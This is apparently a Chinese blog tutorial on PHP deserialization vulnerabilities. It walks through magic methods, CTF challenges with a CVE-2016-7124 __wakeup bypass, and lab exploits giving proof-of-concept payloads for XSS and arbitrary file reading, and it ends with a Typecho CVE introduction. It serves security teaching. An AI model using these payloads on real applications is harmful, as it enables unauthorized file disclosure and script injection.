|
文章目录
一、 基础知识
1、什么是反序列化漏洞:
序列化与反序列化:
1、序列化:
2、反序列化:
二、PHP魔法函数
1、常见方法:
2、安全问题:
三、CTF中的反序列化
例题一:
例题二:
四、靶场练习
1、反序列化触发XSS:
2、反序列化文件读取:
五、CMS实战演示(typecho反序列化漏洞)
影响版本:
环境搭建:
一、 基础知识
1、什么是反序列化漏洞:
程序未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,通过在参数中注入一些代码,从而达到代码执行,SQL 注入,目录遍历等不可控后果,危害较大。
序列化与反序列化:
在了解反序列化漏洞之前,先来了解一下什么是序列化、反序列化以及它们的作用。
1、序列化:
序列化就是将对象object、字符串string、数组array、变量,转换成具有一定格式的字符串,使其能在文件储存或传输的过程中保持稳定的格式。
PHP中通过 serialize() 函数实现,例:
<?php
class Person {
public $name = &#34;Tom&#34;;
private $age = 18;
protected $sex = &#34;male&#34;;
public function hello() {
echo &#34;hello&#34;;
}
}
$class = new Person();
$class_ser = serialize($class);
echo $class_ser;
?>输出:
O:6:&#34;Person&#34;:3:{s:4:&#34;name&#34;;s:3:&#34;Tom&#34;;s:11:&#34;Personage&#34;;i:18;s:6:&#34;*sex&#34;;s:4:&#34;male&#34;;}
其中,从前往后依次为:O代表object,如果是数组则是 i;6代表对象名长度;Person是对象名;3是对象里面的成员变量的数量;括号里面 s 代表 string 数据类型,如果是 i 则代表 int 数据类型;4代表 属性名的长度;name即属性名;s同前面;3 代表属性值长度;Tom即属性值,后面同理(数字不显示长度)。同时注意到类里面的方法并不会序列化。
根据成员变量的的修饰类型不同,在序列化中的表示方法也有所不同。可以看到代码中三个修饰类型分别是public、private、protected。
public,没有变化
private,会变成 %00类名%00属性名
protected,会变成 %00*%00属性名
%00为空白符,空字符也有长度,一个空字符长度为 1,%00 虽然不会显示,但是提交还是要加上去。
总结:一个类经过序列化之后存储在字符串的信息只有 类名称 和 类内成员属性键值对,序列化字符串中没有将类方法一并序列化。
2、反序列化:
简单来说,反序列化就是序列化的逆过程。
通过 unserialize() 函数实现,例:
<?php
class Person {
public $name = &#34;Tom&#34;;
private $age = 18;
protected $sex = &#34;male&#34;;
public function hello() {
echo &#34;hello&#34;;
}
}
$class = new Person();
$class_ser = serialize($class);
//echo $class_ser;
$class_unser = unserialize($class_ser);
var_dump($class_unser);
?>
输出:
object(Person)#2 (3) {
[&#34;name&#34;]=> string(3) &#34;Tom&#34;
[&#34;age&#34;:&#34;Person&#34;:private]=> int(18)
[&#34;sex&#34;:protected]=> string(4) &#34;male&#34;
}可以看到,将字符串反序列化出来之后的类不包含任何类方法。
二、PHP魔法函数
到目前为止,我们可以控制类属性,但还称不上漏洞,只能说是反序列化的特性,还要配合上特定函数才能发挥反序列化漏洞的威力。所以要先了解一些特殊的函数——魔术方法,这些魔术方法均可以在一些特定的情况下自动触发。如果这些魔术方法中存在我们想要执行,或者说可以利用的函数,那我们就能够进一步进行攻击。
1、常见方法:
__construct():构造函数,此函数会在创建一个类的实例时自动调用。
__destruct():析构函数,此函数会在对象的所有引用都被删除或者类被销毁的时候自动调用。
__sleep():执行serialize()函数之前,会检查类中是否存在_sleep()方法。如果存在,该方法会先被调用。
__wakeup():执行unserialize()函数之前,会检查类中是否存在_wakeup()方法。如果存在,则会先调用_wakeup()方法,预先准备对象需要的资源。
__toString():当一个对象被当作一个字符串使用时被调用。例如echo $obj或者拼接字符串时;此方法必须返回一个字符串,否则会产生 E_RECOVERABLE_ERROR 级别的错误。
__get():在读取不可访问的属性值的时候,此魔法函数会自动调用。
__call():在调用未定义的方法时被调用。
当然 PHP 中还有很多魔术方法没有介绍,这里只说了我认为在反序列化漏洞中比较重要的几个。
来看个示例:
<?php
class Test{
public function __construct(){
echo &#39;construct run&#39;;
}
public function __destruct(){
echo &#39;destruct run&#39;;
}
public function __toString(){
echo &#39;toString run&#39;;
return &#39;str&#39;;
}
public function __sleep(){
echo &#39;sleep run&#39;;
return array();
}
public function __wakeup(){
echo &#39;wakeup run&#39;;
}
}
echo &#39;<br>new了一个对象,对象被创建,执行_construct方法</br>&#39;;
$test = new Test();
echo &#39;<br>serialize了一个对象,对象被序列化,先执行_sleep方法,再序列化</br>&#39;;
$sTest = serialize($test);
echo &#39;<br>unserialize()了字符串。先执行_wakeup方法,再反序列化</br>&#39;;
$usTest = unserialize($sTest);
echo &#39;<br>把Test对象当做字符串使用,执行_toString方法</br>&#39;;
$string = &#39;use Test obj as str &#39;.$test;
echo &#39;<br>程序执行完毕,对象自动销毁,执行_destruct方法</br>&#39;;
?>
执行结果:
通过这个例子可以清楚的看到 5 个魔法函数的执行顺序。
2、安全问题:
如何利用反序列化漏洞,取决于应用程序中存在:可用的类,类中有魔法函数,unserialize的参数用户可控。攻击者可以构造恶意的序列化字符串。当应用程序将恶意字符串反序列化为对象后,也就执行了攻击者指定的操作,如代码执行、任意文件读取等。
说完上面的基础知识,现在来看一下CTF中的反序列化的例题吧。
三、CTF中的反序列化
例题一:
<?php
error_reporting(0);
include &#34;flag.php&#34;;
$KEY = &#34;D0g3!!!&#34;;
$str = $_GET[&#39;str&#39;];
if (unserialize($str) === &#34;$KEY&#34;)
{
echo &#34;$flag&#34;;
}
show_source(__FILE__);这是一道很简单的反序列化的题,把 str 反序列化之后与 KEY 相等就能输出 flag。
把 D0g3!!! 进行序列化:
<?php
$KEY=&#34;D0g3!!!&#34;;
echo serialize($KEY);
?>得到:s:7:&#34;D0g3!!!&#34;;
get提交:得到flag
例题二:
题目源码:
<?php
class SoFun{
protected $file=&#39;index.php&#39;;
function __destruct(){
if(!empty($this->file)) {
if(strchr($this-> file,&#34;\\&#34;)===false && strchr($this->file, &#39;/&#39;)===false)
show_source(dirname (__FILE__).&#39;/&#39;.$this ->file);
else
die(&#39;Wrong filename.&#39;);
}
}
function __wakeup(){
$this-> file=&#39;index.php&#39;;
}
public function __toString(){
return &#39;&#39; ;
}
}
if (!isset($_GET[&#39;file&#39;])){
show_source(&#39;index.php&#39;);
}
else{
$file=base64_decode($_GET[&#39;file&#39;]);
echo unserialize($file);
}
?> #<!--key in flag.php-->代码分析:
根据注释的提示,key 在 flag.php 文件中,程序将 get 提交的 file 参数 base64 解码后再反序列化,析构函数 __destruct 可以显示 file 参数中的文件源码,同时为了题目的靶机目录安全用 strchr 函数限制了\ /,不让你任意读取文件,不过没事,我们只需要读 flag.php 即可,但是在执行反序列化之前 __wakeup 函数会先执行,并且锁定了 file 为 index.php,所以现在就是考虑绕过 __wakeup 函数。
这道题牵扯到一个CVE漏洞,CVE-2016-7124:当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行
POC:
<?php
class SoFun{
protected $file=&#39;flag.php&#39;;
}
$poc = new SoFun;
echo serialize($poc);
?> 输出:
O:5:&#34;SoFun&#34;:1:{s:7:&#34;*file&#34;;s:8:&#34;flag.php&#34;;}
将表示成员属性的个数的数字加1或更大的数,同时因为 file 是 protect 属性,所以需要加上\00
O:5:&#34;SoFun&#34;:2:{s:7:&#34;\00*\00file&#34;;s:8:&#34;flag.php&#34;;}
最后再 base64 编码,提交发现不行,查了一下发现要把 s 改为大写,因为 protected 属性的问题, private 属性也有这个问题, 改为 public 后无论大小写都可以,就算是个坑吧。
提交得到flag:
四、靶场练习
1、反序列化触发XSS:
这里使用的是 pikachu 的靶场。
查看一下源码:
class S{
var $test = &#34;pikachu&#34;;
function __construct(){
echo $this->test;
}
}
$html=&#39;&#39;;
if(isset($_POST[&#39;o&#39;])){
$s = $_POST[&#39;o&#39;];
if(!@$unser = unserialize($s)){
$html.=&#34;<p>大兄弟,来点劲爆点儿的!</p>&#34;;
}else{
$html.=&#34;<p>{$unser->test}</p>&#34;;
}
}代码审计:程序将 POST 提交的参数 o 赋值给 s,再将 s 反序列化后的值赋值给 unser 变量,并用@符 不输出警告 (强制转化变量的警告);若能进行赋值操作,即 s 能被反序列化,就将反序列后的 test 值写入到网页中,并在第64行源码 <?php echo $html;?>中执行;注意这里的构造函数 __construct 并不会执行。
构造POC:
<?php
class S{
var $test = &#34;<script>alert(1)</script>&#34;;
}
$a = new S();
echo serialize($a);
?>
得到:
O:1:&#34;S&#34;:1:{s:4:&#34;test&#34;;s:25:&#34;<script>alert(1)</script>&#34;;}
在输入框输入上面代码,触发成功!
2、反序列化文件读取:
靶场地址
本题源码:
// 当他的对象被输出时候,调用__toString
class FileClass{
public $filename = &#39;error.log&#39;;
// 返回读取一个文件的内容
public function __toString(){
return file_get_contents($this->filename);
}
}
class User{
public $age = 0;
public $name = &#39;&#39;;
public function __toString(){
return &#34;User $this->name is $this->age years old&#34;;
}
}
$obj = unserialize($_GET[&#39;user_serialize&#39;]);
echo $obj;代码审计:可以看到有两个类,并且两个类中都有 __toString 函数,下面有个 echo 函数,回把我们输入的反序列内容输出,那么就会执行 __toString 函数,我们可以利用 FileClass 类中的 file_get_contents() 函数读取文件。
先在User类中测试一下:
<?php
class User{
public $age = 18;
public $name = &#34;Tom&#34;;
}
$a = new User();
echo serialize($a);
?>得到:O:4:&#34;User&#34;:2:{s:3:&#34;age&#34;;i:18;s:4:&#34;name&#34;;s:3:&#34;Tom&#34;;}
提交得到:
确实可以执行我们输入的反序列化字符。
读取同目录下unser.php的文件。
POC:
<?php
class FileClass{
public $filename = &#39;unser.php&#39;;
}
$a = new FileClass();
echo serialize($a);
?>得到:O:9:&#34;FileClass&#34;:1:{s:8:&#34;filename&#34;;s:9:&#34;unser.php&#34;;}
提交,成功读取文件:
五、CMS实战演示(typecho反序列化漏洞)
简介:Typecho是使用PHP编写的博客CMS。 Typecho 1.0 版本中前台 install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意PHP代码。远程攻击者可借助采用 base64 编码的序列化的数据利用该漏洞发送shell命令。
CVE编号:CVE-2018-18753
影响版本:
typecho1.0(14.10.10),2017年10月24日之前的所有版本
环境搭建:
下载 typecho14.10.10,下载链接:Tags · typecho/typecho
按照提示一步步安装,注意有个小坑:需要先新建一个名为 typecho 的数据库,不然会报错。
,PHP反序列化的漏洞总结暂时就到这了!
————————————————
版权声明:本文为CSDN博主「未完成的歌~」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:PHP反序列化漏洞总结_未完成的歌~的博客-CSDN博客_php反序列化漏洞利用 |
|